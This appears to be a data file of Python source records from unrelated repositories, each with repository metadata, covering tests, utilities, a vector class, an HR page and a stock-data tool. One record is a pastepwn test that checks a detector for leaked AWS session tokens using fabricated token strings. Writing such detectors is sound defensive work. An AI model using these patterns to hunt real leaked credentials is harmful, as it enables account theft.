def testConstructor(self):
"""NotificationTest: Test Constructor"""
note = puremvc.patterns.observer.Notification('TestNote',5,'TestNoteType')
self.assertEqual(True, note.getName() == 'TestNote')
self.assertEqual(True, note.getBody() == 5)
self.assertEqual(True, note.getType() == 'TestNoteType')
| 63 | 0 | 27 |
ff8b27222520e7624ce6d0daf068f367c583623c | 712 | py | Python | tests/conftest.py | giannisterzopoulos/scribd_dl | a7614a6747ea166bac68278dcfb0e05fc5441613 | [
"MIT"
] | 29 | 2018-07-21T05:22:22.000Z | 2022-02-03T17:02:30.000Z | tests/conftest.py | rohrfacu/scribd-dl | a7614a6747ea166bac68278dcfb0e05fc5441613 | [
"MIT"
] | 15 | 2018-03-20T22:19:03.000Z | 2022-03-11T23:18:33.000Z | tests/conftest.py | rohrfacu/scribd-dl | a7614a6747ea166bac68278dcfb0e05fc5441613 | [
"MIT"
] | 8 | 2019-01-05T15:43:45.000Z | 2021-12-28T02:13:40.000Z | #!/usr/bin/env python
import sys
import os
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import pytest
from scribd_dl import ScribdDL
# def pytest_addoption(parser):
# parser.addoption("--driver", action="store", default="chrome", help="Type in browser type")
# parser.addoption("--url", action="store", default="https://.../", help="url")
@pytest.fixture(scope='session') # Can be module, session, function, class
| 26.37037 | 97 | 0.658708 | #!/usr/bin/env python
import sys
import os
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import pytest
from scribd_dl import ScribdDL
# def pytest_addoption(parser):
# parser.addoption("--driver", action="store", default="chrome", help="Type in browser type")
# parser.addoption("--url", action="store", default="https://.../", help="url")
@pytest.fixture(scope='session') # Can be module, session, function, class
def scribd(request):
options = {
'verbose': True,
'testing': True
}
sc = ScribdDL(options)
sc.start_browser()
def fin():
sc.close()
request.addfinalizer(fin)
return sc # provide the fixture value
| 228 | 0 | 22 |
5e20a42b38ec64f42d467246fa00cb63f2a242d9 | 564 | py | Python | src/loot.py | mbcoalson/AutoDM | de7fbda193cdeb4a08e2b862c1ffa9eda922d64d | [
"MIT"
] | null | null | null | src/loot.py | mbcoalson/AutoDM | de7fbda193cdeb4a08e2b862c1ffa9eda922d64d | [
"MIT"
] | null | null | null | src/loot.py | mbcoalson/AutoDM | de7fbda193cdeb4a08e2b862c1ffa9eda922d64d | [
"MIT"
] | null | null | null | import random | 31.333333 | 80 | 0.673759 | import random
def randmoney(lvl):
basevalue = 1
upper_plat = random.randint(0, 5 if lvl>3 else 0)
upper_gold = random.randint(0, 50)
upper_silver = random.randint(0, 100)
upper_copper = random.randint(0, 500)
n_plat = random.randint(0, basevalue*upper_plat*lvl)
n_gold = random.randint(0, basevalue*upper_gold*lvl)
n_silver = random.randint(0, basevalue*upper_silver*lvl)
n_copper = random.randint(0, basevalue*upper_copper*lvl)
print("{}pp, {}gp, {}sp, {}cp".format(n_plat, n_gold, n_silver, n_copper)) | 526 | 0 | 25 |
16ef2204ff74181241f1fc0339972740f9e691e9 | 802 | py | Python | tests/test_twotuple_metric.py | ffreemt/text-alignment-benchmarks | 4053347c6b1fd2203a1d4a8d70df840fceab6a5f | [
"MIT"
] | null | null | null | tests/test_twotuple_metric.py | ffreemt/text-alignment-benchmarks | 4053347c6b1fd2203a1d4a8d70df840fceab6a5f | [
"MIT"
] | null | null | null | tests/test_twotuple_metric.py | ffreemt/text-alignment-benchmarks | 4053347c6b1fd2203a1d4a8d70df840fceab6a5f | [
"MIT"
] | null | null | null | """Test twotuple_metric."""
# pylint: disable=invalid-name
from pathlib import Path
from itertools import zip_longest
import pandas as pd
from align_benchmark.twotuple_metric import twotuple_metric
file_loc = "data/para-wh-ch2-benchmark1.xlsx"
if not Path(file_loc).exists():
raise SystemExit(f"File [{file_loc}] does not exist.")
_ = pd.read_excel(file_loc, header=0)[["Unnamed: 1", "Unnamed: 3"]]
_.columns = ["list1", "list2"]
bm1 = _.to_numpy().tolist()
lst = [*zip_longest(range(33), range(36), fillvalue=32)]
def test_twotuple_metric55():
"""Test twotuple_metric 5 5."""
assert twotuple_metric(bm1[5], lst[5]) == 0.5
def test_twotuple_metric_nonnumerical_entry():
"""Test entry that cannot be converted to integer."""
assert twotuple_metric([0, 1], [0, ""]) == 0.0
| 25.870968 | 67 | 0.705736 | """Test twotuple_metric."""
# pylint: disable=invalid-name
from pathlib import Path
from itertools import zip_longest
import pandas as pd
from align_benchmark.twotuple_metric import twotuple_metric
file_loc = "data/para-wh-ch2-benchmark1.xlsx"
if not Path(file_loc).exists():
raise SystemExit(f"File [{file_loc}] does not exist.")
_ = pd.read_excel(file_loc, header=0)[["Unnamed: 1", "Unnamed: 3"]]
_.columns = ["list1", "list2"]
bm1 = _.to_numpy().tolist()
lst = [*zip_longest(range(33), range(36), fillvalue=32)]
def test_twotuple_metric55():
"""Test twotuple_metric 5 5."""
assert twotuple_metric(bm1[5], lst[5]) == 0.5
def test_twotuple_metric_nonnumerical_entry():
"""Test entry that cannot be converted to integer."""
assert twotuple_metric([0, 1], [0, ""]) == 0.0
| 0 | 0 | 0 |
1eacd151a7ba45243c2db4ab388c61f20b5a6046 | 2,251 | py | Python | gamma/nodes.py | davidcpage/gamma | c9df927f66dfffa8a9b73ddd0b10e4533e8717f2 | [
"MIT"
] | 1 | 2018-02-05T17:32:39.000Z | 2018-02-05T17:32:39.000Z | gamma/nodes.py | davidcpage/gamma | c9df927f66dfffa8a9b73ddd0b10e4533e8717f2 | [
"MIT"
] | 2 | 2018-02-20T17:49:11.000Z | 2018-07-17T14:36:07.000Z | gamma/nodes.py | davidcpage/gamma | c9df927f66dfffa8a9b73ddd0b10e4533e8717f2 | [
"MIT"
] | 3 | 2018-02-19T12:36:41.000Z | 2018-07-12T08:46:17.000Z | from collections import namedtuple
from inspect import signature
activation_func = node('ActivationFunc', activation_func=None, inplace=True)
add = node('Add', inplace=True)
add_relu = node('AddRelu', inplace=False)
bn = node('BatchNorm2d', ['num_features'], eps=1e-5, momentum=0.1, affine=True, track_running_stats=True)
clip = node('Clip', min_val=-1, max_val=1, inplace=False, min_value=None, max_value=None)
concat_pool_2d = node('ConcatPool2d')
conv = node('Conv2d', ['in_channels', 'out_channels', 'kernel_size'], stride=1, padding=0, dilation=1, groups=1, bias=True)
correct = node('Correct')
dropout = node('Dropout', p=0.5, inplace=False)
global_avg_pool = node('GlobalAvgPool2d')
identity = node('Identity')
linear = node('Linear', ['in_features', 'out_features'], bias=True)
max_pool = node('MaxPool2d', ['kernel_size'], stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
relu = node('ReLU', inplace=True)
relu6 = node('ReLU6', inplace=True)
x_entropy = node('CrossEntropyLoss', weight=None, size_average=True, ignore_index=-100, reduce=True)
shortcut = node_def(Shortcut)#, ['in_channels', 'out_channels', 'stride'], identity=False)
| 45.938776 | 131 | 0.708574 | from collections import namedtuple
from inspect import signature
class NodeDef(namedtuple('NodeDef', ['type', 'params'])):
def __call__(self, *args, **kwargs):
# print(self.type)
params = self.params.bind(*args, **kwargs)
params.apply_defaults()
return {'type': self.type, 'params': dict(params.arguments)}
def node(type_name, arg_names=(), **defaults):
arg_names = list(arg_names) + [k for k in defaults.keys() if k not in arg_names]
return node_def(namedtuple(type_name, arg_names), **defaults)
def node_def(type, **defaults):
sig = signature(type)
if defaults:
params = [(param.replace(default=defaults[name]) if name in defaults else param) for name, param in sig.parameters.items()]
sig = sig.replace(parameters=params)
return NodeDef(type, sig)
class Shortcut():
def __init__(self, in_channels, out_channels, stride, identity=False):
self.in_channels, self.out_channels, self.stride, self.identity = in_channels, out_channels, stride, identity
def __call__(self, x):
if self.identity: return x
raise NotImplementedError
activation_func = node('ActivationFunc', activation_func=None, inplace=True)
add = node('Add', inplace=True)
add_relu = node('AddRelu', inplace=False)
bn = node('BatchNorm2d', ['num_features'], eps=1e-5, momentum=0.1, affine=True, track_running_stats=True)
clip = node('Clip', min_val=-1, max_val=1, inplace=False, min_value=None, max_value=None)
concat_pool_2d = node('ConcatPool2d')
conv = node('Conv2d', ['in_channels', 'out_channels', 'kernel_size'], stride=1, padding=0, dilation=1, groups=1, bias=True)
correct = node('Correct')
dropout = node('Dropout', p=0.5, inplace=False)
global_avg_pool = node('GlobalAvgPool2d')
identity = node('Identity')
linear = node('Linear', ['in_features', 'out_features'], bias=True)
max_pool = node('MaxPool2d', ['kernel_size'], stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
relu = node('ReLU', inplace=True)
relu6 = node('ReLU6', inplace=True)
x_entropy = node('CrossEntropyLoss', weight=None, size_average=True, ignore_index=-100, reduce=True)
shortcut = node_def(Shortcut)#, ['in_channels', 'out_channels', 'stride'], identity=False)
| 868 | 32 | 170 |
d36d0276ec2a4bb063f2e0f21411e1ec075d35a9 | 1,621 | py | Python | common/src/stack/command/stack/commands/dump/vm/__init__.py | sammeidinger/stack | a8085dce179dbe903f65f136f4b63bcc076cc057 | [
"BSD-3-Clause"
] | 123 | 2015-05-12T23:36:45.000Z | 2017-07-05T23:26:57.000Z | common/src/stack/command/stack/commands/dump/vm/__init__.py | sammeidinger/stack | a8085dce179dbe903f65f136f4b63bcc076cc057 | [
"BSD-3-Clause"
] | 177 | 2015-06-05T19:17:47.000Z | 2017-07-07T17:57:24.000Z | common/src/stack/command/stack/commands/dump/vm/__init__.py | sammeidinger/stack | a8085dce179dbe903f65f136f4b63bcc076cc057 | [
"BSD-3-Clause"
] | 32 | 2015-06-07T02:25:03.000Z | 2017-06-23T07:35:35.000Z | # @copyright@
# Copyright (c) 2006 - 2019 Teradata
# All rights reserved. Stacki(r) v5.x stacki.com
# https://github.com/Teradata/stacki/blob/master/LICENSE.txt
# @copyright@
import stack
import stack.commands
from collections import defaultdict
from collections import OrderedDict
from pathlib import Path
import json
class Command(stack.commands.dump.command):
"""
Dump the contents of the stacki database as json.
This command dumps specifically the virtual machine data.
For each host added as a virtual machine, it will dump the
vm specific data including the hypervisor, storage, memory,
and cpu cores
<example cmd='dump vm'>
Dump json data for virtual machines in the stacki database
</example>
<related>load</related>
"""
| 26.57377 | 60 | 0.684146 | # @copyright@
# Copyright (c) 2006 - 2019 Teradata
# All rights reserved. Stacki(r) v5.x stacki.com
# https://github.com/Teradata/stacki/blob/master/LICENSE.txt
# @copyright@
import stack
import stack.commands
from collections import defaultdict
from collections import OrderedDict
from pathlib import Path
import json
class Command(stack.commands.dump.command):
"""
Dump the contents of the stacki database as json.
This command dumps specifically the virtual machine data.
For each host added as a virtual machine, it will dump the
vm specific data including the hypervisor, storage, memory,
and cpu cores
<example cmd='dump vm'>
Dump json data for virtual machines in the stacki database
</example>
<related>load</related>
"""
def run(self, params, args):
# Get all our storage info first
# so the command only has to be run
# once for all VM hosts
storage = defaultdict(list)
for row in self.call('list.vm.storage'):
host = row['Virtual Machine']
disk_loc = Path(row['Location']).parent
storage[host].append(OrderedDict(
disk_name = row['Name'],
disk_type = row['Type'],
location = str(disk_loc),
size = row['Size'],
image_name = row['Image Name'],
mountpoint = row['Mountpoint']))
dump = []
# Dump our VM host information
for row in self.call('list.vm', args):
name = row['virtual machine']
dump.append(OrderedDict(
name = name,
hypervisor = row['hypervisor'],
memory = row['memory'],
cpu = row['cpu'],
disks = storage[name]))
self.addText(json.dumps(OrderedDict(vm=dump), indent=8))
| 850 | 0 | 24 |
215020ae42ad538700906eca06b7f4a0544b6577 | 6,250 | py | Python | py-smallpt/core/vector.py | matt77hias/py-smallpt | 906570f789107e5d4c5007ff7858b28d323c0bba | [
"MIT"
] | null | null | null | py-smallpt/core/vector.py | matt77hias/py-smallpt | 906570f789107e5d4c5007ff7858b28d323c0bba | [
"MIT"
] | null | null | null | py-smallpt/core/vector.py | matt77hias/py-smallpt | 906570f789107e5d4c5007ff7858b28d323c0bba | [
"MIT"
] | 2 | 2017-08-03T11:35:42.000Z | 2019-02-02T17:04:43.000Z | from math import isnan, sqrt, pow, floor, ceil, trunc
from math_tools import clamp | 30.940594 | 148 | 0.53216 | from math import isnan, sqrt, pow, floor, ceil, trunc
from math_tools import clamp
class Vector3(object):
def __init__(self, x = 0.0, y = 0.0, z = 0.0):
self.raw = [float(x), float(y), float(z)]
def x(self):
return self.raw[0]
def y(self):
return self.raw[1]
def z(self):
return self.raw[2]
def has_NaNs(self):
return isnan(self.raw[0]) or isnan(self.raw[1]) or isnan(self.raw[2])
def __copy__(self):
return self.__deepcopy__();
def __deepcopy__(self):
return Vector3(self.raw[0], self.raw[1], self.raw[2])
def __getitem__(self, i):
return self.raw[i]
def __neg__(self):
return Vector3(-self.raw[0], -self.raw[1], -self.raw[2])
def __add__(self, x):
if isinstance(x, Vector3):
return Vector3(self.raw[0] + x[0], self.raw[1] + x[1], self.raw[2] + x[2])
else:
return Vector3(self.raw[0] + x, self.raw[1] + x, self.raw[2] + x)
def __radd__(self, x):
return Vector3(x + self.raw[0], x + self.raw[1], x + self.raw[2])
def __sub__(self, x):
if isinstance(x, Vector3):
return Vector3(self.raw[0] - x[0], self.raw[1] - x[1], self.raw[2] - x[2])
else:
return Vector3(self.raw[0] - x, self.raw[1] - x, self.raw[2] - x)
def __rsub__(self, x):
return Vector3(x - self.raw[0], x - self.raw[1], x - self.raw[2])
def __mul__(self, x):
if isinstance(x, Vector3):
return Vector3(self.raw[0] * x[0], self.raw[1] * x[1], self.raw[2] * x[2])
else:
return Vector3(self.raw[0] * x, self.raw[1] * x, self.raw[2] * x)
def __rmul__(self, x):
return Vector3(x * self.raw[0], x * self.raw[1], x * self.raw[2])
def __div__(self, x):
if isinstance(x, Vector3):
return Vector3(self.raw[0] / x[0], self.raw[1] / x[1], self.raw[2] / x[2])
else:
inv_x = 1.0 / x
return Vector3(self.raw[0] * inv_x, self.raw[1] * inv_x, self.raw[2] * inv_x)
def __rdiv__(self, x):
return Vector3(x / self.raw[0], x / self.raw[1], x / self.raw[2])
def __truediv__(self, x):
if isinstance(x, Vector3):
return Vector3(self.raw[0] / x[0], self.raw[1] / x[1], self.raw[2] / x[2])
else:
inv_x = 1.0 / x
return Vector3(self.raw[0] * inv_x, self.raw[1] * inv_x, self.raw[2] * inv_x)
def __rtruediv__(self, x):
return Vector3(x / self.raw[0], x / self.raw[1], x / self.raw[2])
def dot(self, v):
return self.raw[0] * v[0] + self.raw[1] * v[1] + self.raw[2] * v[2]
def cross(self, v):
return Vector3(self.raw[1] * v[2] - self.raw[2] * v[1], self.raw[2] * v[0] - self.raw[0] * v[2], self.raw[0] * v[1] - self.raw[1] * v[0]);
def __eq__(self, v):
return self.raw[0] == v[0] and self.raw[1] == v[1] and self.raw[2] == v[2]
def __ne__(self, v):
return self.raw[0] != v[0] or self.raw[1] != v[1] or self.raw[2] != v[2]
def __lt__(self, v):
return self.raw[0] < v[0] and self.raw[1] < v[1] and self.raw[2] < v[2]
def __le__(self, v):
return self.raw[0] <= v[0] and self.raw[1] <= v[1] and self.raw[2] <= v[2]
def __gt__(self, v):
return self.raw[0] > v[0] and self.raw[1] > v[1] and self.raw[2] > v[2]
def __ge__(self, v):
return self.raw[0] >= v[0] and self.raw[1] >= v[1] and self.raw[2] >= v[2]
def min_dimension(self):
if self.raw[0] < self.raw[1] and self.raw[0] < self.raw[2]:
return 0
if self.raw[1] < self.raw[2]:
return 1
return 2
def max_dimension(self):
if self.raw[0] > self.raw[1] and self.raw[0] > self.raw[2]:
return 0
if self.raw[1] > self.raw[2]:
return 1
return 2
def min_value(self):
if self.raw[0] < self.raw[1] and self.raw[0] < self.raw[2]:
return self.raw[0]
if self.raw[1] < self.raw[2]:
return self.raw[1]
return self.raw[2]
def max_value(self):
if self.raw[0] > self.raw[1] and self.raw[0] > self.raw[2]:
return self.raw[0]
if self.raw[1] > self.raw[2]:
return self.raw[1]
return self.raw[2]
def norm2_squared(self):
return self.raw[0] * self.raw[0] + self.raw[1] * self.raw[1] + self.raw[2] * self.raw[2]
def norm2(self):
return sqrt(self.norm2_squared())
def normalize(self):
a = 1.0 / self.norm2()
self.raw[0] *= a
self.raw[1] *= a
self.raw[2] *= a
return self
def __str__(self):
return '[' + str(self.raw[0]) + ' ' + str(self.raw[1]) + ' ' + str(self.raw[2]) + ']'
@classmethod
def apply_unary(cls, f, v, *args, **kwargs):
return Vector3(f(v.raw[0], *args, **kwargs), f(v.raw[1], *args, **kwargs), f(v.raw[2], *args, **kwargs))
@classmethod
def apply_binary(cls, f, v1, v2, *args, **kwargs):
return Vector3(f(v1.raw[0], v2.raw[0], *args, **kwargs), f(v1.raw[1], v2.raw[1], *args, **kwargs), f(v1.raw[2], v2.raw[2], *args, **kwargs))
@classmethod
def sqrt(cls, v):
return cls.apply_unary(sqrt, v)
@classmethod
def pow(cls, v, a):
return cls.apply_unary(pow, v, a)
@classmethod
def abs(cls, v):
return cls.apply_unary(abs, v)
@classmethod
def min(cls, v1, v2):
return cls.apply_binary(min, v1, v2)
@classmethod
def max(cls, v1, v2):
return cls.apply_binary(max, v1, v2)
@classmethod
def round(cls, v):
return cls.apply_unary(round, v)
@classmethod
def floor(cls, v):
return cls.apply_unary(floor, v)
@classmethod
def ceil(cls, v):
return cls.apply_unary(ceil, v)
@classmethod
def trunc(cls, v):
return cls.apply_unary(trunc, v)
@classmethod
def clamp(cls, v, low = 0.0, high = 1.0):
return cls.apply_unary(clamp, v, low=low, high=high)
@classmethod
def lerp(cls, a, v1, v2):
return v1 + a * (v2 - v1)
@classmethod
def permute(cls, v, x, y, z):
return Vector3(v.raw[x], v.raw[y], v.raw[z]) | 4,551 | 1,594 | 23 |
9482f2a095b766caa8ea6bb8d60fb30b7f4d1833 | 880 | py | Python | selfdrive/test/process_replay/download_ref_logs.py | Zapman69/openpilot2 | cbf7d8a4450c4f187e6e4ccc5fc3b1ff9854f888 | [
"MIT"
] | null | null | null | selfdrive/test/process_replay/download_ref_logs.py | Zapman69/openpilot2 | cbf7d8a4450c4f187e6e4ccc5fc3b1ff9854f888 | [
"MIT"
] | 1 | 2021-08-29T13:55:01.000Z | 2021-08-29T14:07:27.000Z | selfdrive/test/process_replay/download_ref_logs.py | Zapman69/openpilot2 | cbf7d8a4450c4f187e6e4ccc5fc3b1ff9854f888 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import os
import requests
from selfdrive.test.process_replay.test_processes import segments
from selfdrive.test.process_replay.process_replay import CONFIGS
BASE_URL = "https://github.com/martinl/openpilot-ci/raw/master/process_replay/"
process_replay_dir = os.path.dirname(os.path.abspath(__file__))
ref_commit = open(os.path.join(process_replay_dir, "ref_commit")).read().strip()
for car_brand, segment in segments:
for cfg in CONFIGS:
cmp_log_url = (BASE_URL + "%s/%s_%s_%s.bz2" % (ref_commit, segment.replace("|", "_"), cfg.proc_name, ref_commit))
cmp_log_fn = os.path.join(process_replay_dir, "%s_%s_%s.bz2" % (segment, cfg.proc_name, ref_commit))
r = requests.get(cmp_log_url)
if r.status_code == 200:
with open(cmp_log_fn, 'wb') as f:
f.write(r.content)
else:
print("Failed to download: " + cmp_log_url)
| 38.26087 | 117 | 0.725 | #!/usr/bin/env python3
import os
import requests
from selfdrive.test.process_replay.test_processes import segments
from selfdrive.test.process_replay.process_replay import CONFIGS
BASE_URL = "https://github.com/martinl/openpilot-ci/raw/master/process_replay/"
process_replay_dir = os.path.dirname(os.path.abspath(__file__))
ref_commit = open(os.path.join(process_replay_dir, "ref_commit")).read().strip()
for car_brand, segment in segments:
for cfg in CONFIGS:
cmp_log_url = (BASE_URL + "%s/%s_%s_%s.bz2" % (ref_commit, segment.replace("|", "_"), cfg.proc_name, ref_commit))
cmp_log_fn = os.path.join(process_replay_dir, "%s_%s_%s.bz2" % (segment, cfg.proc_name, ref_commit))
r = requests.get(cmp_log_url)
if r.status_code == 200:
with open(cmp_log_fn, 'wb') as f:
f.write(r.content)
else:
print("Failed to download: " + cmp_log_url)
| 0 | 0 | 0 |
10d365fb463f6592b336de1f892b803c5ca65f1e | 926 | py | Python | sample/application/example/example/service/contact_service.py | problemfighter/pf-flask | c13a0d13284506cd5543ba596cc1077fe85c1075 | [
"Apache-2.0"
] | 5 | 2021-09-14T18:37:01.000Z | 2022-01-06T06:44:16.000Z | sample/application/example/example/service/contact_service.py | problemfighter/pf-flask | c13a0d13284506cd5543ba596cc1077fe85c1075 | [
"Apache-2.0"
] | null | null | null | sample/application/example/example/service/contact_service.py | problemfighter/pf-flask | c13a0d13284506cd5543ba596cc1077fe85c1075 | [
"Apache-2.0"
] | null | null | null | from example.dto.contact_dto import ContactCreateDto, ContactUpdateDto, ContactDetailsDto
from example.model.contact import Contact
from pf_sqlalchemy.crud.pfs_rest_helper_service import PfsRestHelperService
pfs_rest_helper_service = PfsRestHelperService(Contact)
| 31.931034 | 89 | 0.771058 | from example.dto.contact_dto import ContactCreateDto, ContactUpdateDto, ContactDetailsDto
from example.model.contact import Contact
from pf_sqlalchemy.crud.pfs_rest_helper_service import PfsRestHelperService
pfs_rest_helper_service = PfsRestHelperService(Contact)
class ContactService:
def create(self):
return pfs_rest_helper_service.rest_create(ContactCreateDto())
def update(self):
return pfs_rest_helper_service.rest_update(ContactUpdateDto())
def details(self, model_id: int):
return pfs_rest_helper_service.rest_details(model_id, ContactDetailsDto())
def delete(self, model_id: int):
return pfs_rest_helper_service.rest_delete(model_id)
def restore(self, model_id: int):
return pfs_rest_helper_service.rest_restore(model_id)
def list(self):
search = []
return pfs_rest_helper_service.rest_list(ContactDetailsDto(), search=search)
| 474 | 0 | 185 |
473f1e1eeb6b340b2ca16fc3da17da150f626195 | 661 | py | Python | setup.py | libre-man/DJFeet | 7517e7930bdc23d22765c64d7351d4011515dcaa | [
"MIT"
] | 2 | 2018-09-29T22:41:28.000Z | 2018-10-02T16:07:11.000Z | setup.py | libre-man/DJFeet | 7517e7930bdc23d22765c64d7351d4011515dcaa | [
"MIT"
] | null | null | null | setup.py | libre-man/DJFeet | 7517e7930bdc23d22765c64d7351d4011515dcaa | [
"MIT"
] | null | null | null | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'A program does that is a DJ by using feedback provided by the dancers.',
'author': 'Thomas Schaper',
'url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'download_url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'author_email': 'thomas@libremail.nl',
'version': '0.0',
'install_requires': ['nose'],
'packages': ['dj_feet'],
'scripts': [],
'entry_points': {
'console_scripts': [
'server = dj_feet.cli:main'
]
},
'name': 'dj_feet'
}
setup(**config)
| 26.44 | 92 | 0.621785 | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'A program does that is a DJ by using feedback provided by the dancers.',
'author': 'Thomas Schaper',
'url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'download_url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'author_email': 'thomas@libremail.nl',
'version': '0.0',
'install_requires': ['nose'],
'packages': ['dj_feet'],
'scripts': [],
'entry_points': {
'console_scripts': [
'server = dj_feet.cli:main'
]
},
'name': 'dj_feet'
}
setup(**config)
| 0 | 0 | 0 |
b47744010a6348034a70d84f8b9a77662479b6f6 | 2,630 | py | Python | pastepwn/analyzers/tests/awssessiontokenanalyzer_test.py | palaparthi/pastepwn | 62b8b4e0100a55aa0db6f3441a272770e9b9d23b | [
"MIT"
] | null | null | null | pastepwn/analyzers/tests/awssessiontokenanalyzer_test.py | palaparthi/pastepwn | 62b8b4e0100a55aa0db6f3441a272770e9b9d23b | [
"MIT"
] | null | null | null | pastepwn/analyzers/tests/awssessiontokenanalyzer_test.py | palaparthi/pastepwn | 62b8b4e0100a55aa0db6f3441a272770e9b9d23b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import unittest
from unittest import mock
from pastepwn.analyzers.awssessiontokenanalyzer import AWSSessionTokenAnalyzer
if __name__ == '__main__':
unittest.main()
| 39.848485 | 101 | 0.675285 | # -*- coding: utf-8 -*-
import unittest
from unittest import mock
from pastepwn.analyzers.awssessiontokenanalyzer import AWSSessionTokenAnalyzer
class TestAWSSessionTokenAnalyzer(unittest.TestCase):
def setUp(self):
self.analyzer = AWSSessionTokenAnalyzer(None)
self.paste = mock.Mock()
def test_mach_positive(self):
"""Test if positives are recognized"""
self.paste.body = "'aws_session_token'\\\\ssss:\\\\ssss'AiughaiusDWIHJFUFERHO2134234'"
self.assertTrue(self.analyzer.match(self.paste))
self.paste.body = "'aws'\\\\ssss:\\\\ssss'auyhguywgerdbyubduiywebh'"
self.assertTrue(self.analyzer.match(self.paste))
self.paste.body = "'aws_session'\\\\ssss:\\\\ssss'YTUF5GUY76ibuihIUIU98jJB+//='"
self.assertTrue(self.analyzer.match(self.paste))
self.paste.body = "'aws_session_token'\\\\s:\\\\s'auyhguywgerdbyubduiywebh'"
self.assertTrue(self.analyzer.match(self.paste))
self.paste.body = "'aws_session_token'\\\\:\\\\'auyhguywgerdbyubduiywebh'"
self.assertTrue(self.analyzer.match(self.paste))
self.paste.body = "'aws_session_token'\\\\:\\\\'auyhguywgerdbyubduiywebh'"
self.assertTrue(self.analyzer.match(self.paste))
self.paste.body = "\\\\ssssssssssssssssssssss:\\\\ssssssssssssssss'auyhguywgerdbyubduiywebh'"
self.assertTrue(self.analyzer.match(self.paste))
self.paste.body = "\\\\=\\\\'auyhguywgerdbyubduiywebh'"
self.assertTrue(self.analyzer.match(self.paste))
self.paste.body = "\\\\=>\\\\'auyhguywgerdbyubduiywebh'"
self.assertTrue(self.analyzer.match(self.paste))
def test_match_negative(self):
"""Test if negatives are recognized"""
self.paste.body = "\\\\ssss:\\\\ssss'Aiughai'"
self.assertFalse(self.analyzer.match(self.paste))
self.paste.body = "'aws_session'\\ssss:\\\\ssss'YTUF5GUY76ibuihIUIU98jJB+ÒÈÒà'"
self.assertFalse(self.analyzer.match(self.paste))
self.paste.body = "'aws_session_asd'\\\\aaa:\\\\ssss'auyhguywgerdbyubduiywebh'"
self.assertFalse(self.analyzer.match(self.paste))
self.paste.body = "\"aws_session\"\\\\ssss:\\ssss'auyhguywgerdbyubduiywebh'"
self.assertFalse(self.analyzer.match(self.paste))
self.paste.body = "'aws_session'\\\\ssss$\\\\ssss'auyhguywgerdbyubduiywebh'"
self.assertFalse(self.analyzer.match(self.paste))
self.paste.body = "'aws_session'\\\\ssss:\\\\ssss\"auyhguywgerdbyubduiywebh\""
self.assertFalse(self.analyzer.match(self.paste))
if __name__ == '__main__':
unittest.main()
| 82 | 2,333 | 23 |
0cb7f32b56d33e46178c5453ac04b0c73f36c8c5 | 2,336 | py | Python | erpx_hrm/www/hr/index.py | neel2292/erpx_hrm | a58947f8d921593fd3a8cda0db33ffae253ce75e | [
"MIT"
] | null | null | null | erpx_hrm/www/hr/index.py | neel2292/erpx_hrm | a58947f8d921593fd3a8cda0db33ffae253ce75e | [
"MIT"
] | null | null | null | erpx_hrm/www/hr/index.py | neel2292/erpx_hrm | a58947f8d921593fd3a8cda0db33ffae253ce75e | [
"MIT"
] | null | null | null | import frappe
import json
from datetime import timedelta, date
| 42.472727 | 236 | 0.611729 | import frappe
import json
from datetime import timedelta, date
def get_context(context):
if frappe.session.user == 'Guest':
frappe.local.flags.redirect_location = '/'
raise frappe.Redirect
context.user = frappe.session.user
context.user_doc = frappe.session
context.csrf_token = frappe.sessions.get_csrf_token()
context.emp_doc = frappe.get_list('Employee',
{ 'company_email': frappe.session.user },
['name', 'company', 'date_of_joining', 'branch']
)
#Get employee info
context.employee = None
if frappe.db.exists("Employee", {'user_id': frappe.session.user}):
employee = frappe.get_doc("Employee", {"user_id": context.user}) or None
context.employee = employee or None
else:
employee = frappe.new_doc("Employee")
#Get branch info
branch = ""
if employee and employee.branch:
branch = frappe.get_doc("Branch", {"name": employee.branch}) or ""
context.branch = branch or None
#Get Lis of Leave Application info
from_date = date.today().strftime("%Y-%m-%d")
to_date = (date.today() + timedelta(days=7)).strftime("%Y-%m-%d")
leave_application_list = frappe.db.sql("""select e.image, l.employee, l.employee_name, from_date, to_date, group_concat(IF(l.from_date != l.to_date, CONCAT_WS('->',l.from_date,l.to_date), l.to_date) SEPARATOR '<br>') as leave_date
from `tabLeave Application` as l
inner join `tabEmployee` as e on l.employee = e.name
where
((from_date >= %s and from_date <= %s) or (to_date >= %s and to_date <= %s))
and l.docstatus = 1 and l.status = "Approved"
group by l.employee
""", (from_date, to_date, from_date, to_date), as_dict = True)
context.leave_application_list = leave_application_list or None
#Get list of employee info
employee_list = frappe.db.sql("""select image, employee_name, date_of_birth
from `tabEmployee`
where DayOfYear(date_of_birth) between DayOfYear(%s) and DayOfYear(%s)
""", (from_date, to_date), as_dict = True)
context.employee_list = employee_list or None
return context
| 2,250 | 0 | 23 |
077879dc538f7f7a677cd28f4702fd679248dc27 | 7,512 | py | Python | stockdaq/acquisiter/acquisiter.py | terrencetec/stockdaq | 8561b1d1b94b6091dfe4d9ebf2fc84daa2d571d6 | [
"MIT"
] | null | null | null | stockdaq/acquisiter/acquisiter.py | terrencetec/stockdaq | 8561b1d1b94b6091dfe4d9ebf2fc84daa2d571d6 | [
"MIT"
] | 7 | 2021-01-08T01:02:58.000Z | 2021-01-12T17:38:03.000Z | stockdaq/acquisiter/acquisiter.py | terrencetec/stockdaq | 8561b1d1b94b6091dfe4d9ebf2fc84daa2d571d6 | [
"MIT"
] | null | null | null | """Data acquisition system.
"""
import datetime
import os
import sys
import time
import stockdaq.data.downloader_dict
from stockdaq.logger import logger
class Acquisiter:
"""Data Acquisiter
Parameters
----------
stocklist: list of str
List of symbols of stocks of interest.
apikey_dict: dict
A dictionary of API keys in {"api":"key"} pairs.
api_list: list of str, optional
List of APIs, in preferred order.
Options are ["Alpha Vantage",]
root_dir: str, optional
The root directory of the database.
frequency: str, optional
"intraday", "daily", "weekly", "monthly"
